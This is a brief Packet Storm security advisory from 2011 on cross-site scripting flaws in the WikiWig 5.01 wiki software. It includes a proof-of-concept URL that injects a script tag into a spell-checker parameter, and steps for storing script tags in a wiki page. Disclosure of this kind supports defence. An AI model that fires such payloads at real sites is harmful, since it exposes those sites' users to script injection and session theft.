WikiWig 5.01 Cross Site Scripting

2011-03-16T00:00:00
ID PACKETSTORM:99363
Type packetstorm
Reporter AutoSec Tools
Modified 2011-03-16T00:00:00

Description

                                        
                                            `------------------------------------------------------------------------  
Software................WikiWig 5.01  
Vulnerability...........Persistent/Reflected Cross-site Scripting  
Threat Level............Moderate (2/5)  
Download................http://wikiwig.sourceforge.net/  
Disclosure Date.........3/10/2011  
Tested On...............Windows Vista + XAMPP  
------------------------------------------------------------------------  
Author..................AutoSec Tools  
Site....................http://www.autosectools.com/  
Email...................John Leitch <john@autosectools.com>  
------------------------------------------------------------------------  
  
  
--Description--  
  
A persistent/reflected cross-site scripting vulnerability in WikiWig  
5.01 can be exploited to execute arbitrary JavaScript.  
  
  
--PoC--  
  
Reflected:  
http://localhost/wikiwig5.01/_wk/Xinha/plugins/SpellChecker/spell-check-savedicts.php?to_r_list=%3Cscript%3Ealert(0)%3C%2fscript%3E  
  
Persistent:  
Create a user account. Edit any page and add script tags.  
  
<script>alert(0)</script>  
`